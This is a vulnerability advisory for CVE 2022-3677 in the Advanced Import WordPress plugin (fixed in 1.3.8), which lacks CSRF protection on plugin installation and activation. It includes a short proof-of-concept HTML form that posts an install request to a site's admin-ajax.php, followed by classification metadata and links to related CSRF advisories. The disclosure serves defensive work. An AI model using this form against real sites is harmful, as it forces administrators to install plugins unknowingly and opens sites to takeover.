Advanced Import < 1.3.8 – Arbitrary Plugin Installation & Activation via CSRF | CVE 2022-3677 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when installing and activating plugins, which could allow attackers to make a logged in admin install arbitrary plugins from WordPress.org, and activate arbitrary ones from the blog via CSRF attacks

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin-ajax.php?action=install_plugin" method="POST">
    <input type="text" name="slug" value="hello-dolly">
    <input type="text" name="plugin" value="hello-dolly/hello.php">
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

advanced-import

Fixed in 1.3.8

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID

5a7c6367-a3e6-4411-8865-2a9dbc9f1450

Timeline

Publicly Published

2022-11-14 (about 1 years ago)

Added

2022-11-14 (about 1 years ago)

Last Updated

2022-11-14 (about 1 years ago)

Other

Published

Title

Published

2023-05-16

Title

WP < 6.2.1 - Thumbnail Image Update via CSRF

Published

2023-08-16

Title

Enhanced Ecommerce Google Analytics for WooCommerce < 3.7.2 - CSRF

Published

2023-12-05

Title

LiveChat < 4.5.16 - Cross-Site Request Forgery

Published

2023-02-28

Title

Smart YouTube PRO <= 4.3 - Cross-Site Request Forgery

Published

2022-01-03

Title

NextScripts: Social Networks Auto-Poster < 4.3.25 - Arbitrary Post Deletion via CSRF